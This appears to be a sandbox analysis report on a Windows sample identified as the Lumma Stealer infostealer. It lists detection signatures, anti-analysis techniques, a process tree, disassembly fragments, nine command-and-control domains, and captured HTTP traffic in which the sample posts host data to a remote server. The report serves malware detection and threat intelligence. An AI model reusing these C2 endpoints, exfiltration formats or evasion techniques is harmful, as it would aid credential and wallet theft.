Edit tour

Windows Analysis Report
YrxiR3yCLm.exe

Overview

General Information

Sample name:	YrxiR3yCLm.exe renamed because original name is a hash value
Original sample name:	8e9ea8e0e87ddaecdbb57823ead16033.exe
Analysis ID:	1581234
MD5:	8e9ea8e0e87ddaecdbb57823ead16033
SHA1:	55a9f08b8cb50a2712f74ade216571f823c0a1fd
SHA256:	aea1e74825e2d187e04a81bb5ce56593f5769c4b86218e5fc820d900801abdb4
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

YrxiR3yCLm.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\YrxiR3yCLm.exe" MD5: 8E9EA8E0E87DDAECDBB57823EAD16033)

LummaC2.exe (PID: 4480 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 607000C61FCB5A41B8D511B5ED7625D4)

Set-up.exe (PID: 2364 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["censeractersj.click", "slipperyloo.lat", "talkynicer.lat", "wordyfindy.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat", "manyrestro.lat", "shapestickyr.lat"], "Build id": "Fppr10--Indus2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.YrxiR3yCLm.exe.6e0000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6d30d2:$s1: Runner 0x6d3237:$s3: RunOnStartup 0x6d30e6:$a1: Antis 0x6d3113:$a2: antiVM 0x6d311a:$a3: antiSandbox 0x6d3126:$a4: antiDebug 0x6d3130:$a5: antiEmulator 0x6d313d:$a6: enablePersistence 0x6d314f:$a7: enableFakeError 0x6d3260:$a8: DetectVirtualMachine 0x6d3285:$a9: DetectSandboxie 0x6d32b0:$a10: DetectDebugger 0x6d32bf:$a11: CheckEmulator

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: YrxiR3yCLm.exe

Avira: detected

Found malware configuration

Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["censeractersj.click", "slipperyloo.lat", "talkynicer.lat", "wordyfindy.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat", "manyrestro.lat", "shapestickyr.lat"], "Build id": "Fppr10--Indus2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: YrxiR3yCLm.exe	Virustotal: Detection: 33%			Perma Link
Source: YrxiR3yCLm.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: YrxiR3yCLm.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: censeractersj.click
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.2950226819.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Fppr10--Indus2

Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_8622a720-6

Source: YrxiR3yCLm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002FC59C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	1_2_002FEEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	1_2_002FEEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	1_2_002FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	1_2_002FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	1_2_002FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	1_2_002FB813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_002EB078
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	1_2_002FF040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	1_2_002FF040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002E90B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	1_2_002E90B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_002D8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_002EC894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push esi	1_2_002E10F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	1_2_002FE8D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002DD172
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	1_2_002FD140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	1_2_002E59B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002DD189
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_002EC984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_002EC9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_002EC9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then and esi, 80000000h	1_2_002C8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	1_2_002E6230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, edx	1_2_002D720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	1_2_002D720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_002D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov eax, ecx	1_2_002D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	1_2_002D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	1_2_002D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	1_2_002D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	1_2_002FDAA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	1_2_002E8290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_002D92C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	1_2_002CD35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	1_2_002FDBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	1_2_002FBC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002FBC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	1_2_002FB46A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	1_2_002DCC60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_002C7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	1_2_002C7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	1_2_002F7D00
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, ecx	1_2_002DD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, eax	1_2_002D6D52
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_002E9DA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, ecx	1_2_002CEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_002CEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_002DAD81
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_002FBCDB
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	1_2_002E8640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	1_2_002D46C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [ecx], al	1_2_002E66C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	1_2_002E26D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_002EBF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	1_2_002F7790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push dword ptr [esp+04h]	1_2_002F7790

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: censeractersj.click
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 591460Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 31 34 38 30 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 3.218.7.103 3.218.7.103

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top

Source: unknown

HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 591460Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 31 34 38 30 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:56:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
